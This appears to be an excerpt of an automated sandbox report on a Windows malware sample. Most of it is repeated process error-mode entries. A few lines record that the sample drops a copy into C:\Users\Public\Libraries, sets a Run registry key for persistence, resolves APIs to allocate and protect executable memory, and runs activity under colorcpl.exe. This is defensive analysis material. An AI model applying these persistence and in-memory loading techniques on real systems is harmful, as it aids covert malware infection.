          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021765FC push 02176657h; ret 0_2_0217664F
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021765FA push 02176657h; ret 0_2_0217664F
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02176A48 push 02176A8Ah; ret 0_2_02176A82
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217CB4C push 0217CFA2h; ret 0_2_0217CF9A
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02173894 push eax; ret 0_2_021738D0
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217CE1C push 0217CFA2h; ret 0_2_0217CF9A
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217FEA0 push 0217FF16h; ret 0_2_0217FF0E
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217FFA4 push 0217FFF1h; ret 0_2_0217FFE9
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217FFA3 push 0217FFF1h; ret 0_2_0217FFE9
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02188C58 push ecx; mov dword ptr [esp], edx0_2_02188C5D
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218EC64 push 0218EE54h; ret 0_2_0218EE4C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E6D0D1 push ecx; ret 1_2_06E6D0E4
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02186388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary,0_2_02186388
          Source: C:\Users\user\Desktop\0321423605241625.exeFile created: C:\Users\Public\Libraries\Mwqrxeuz.exeJump to dropped file
          Source: C:\Users\user\Desktop\0321423605241625.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MwqrxeuzJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021854F4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_021854F4
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
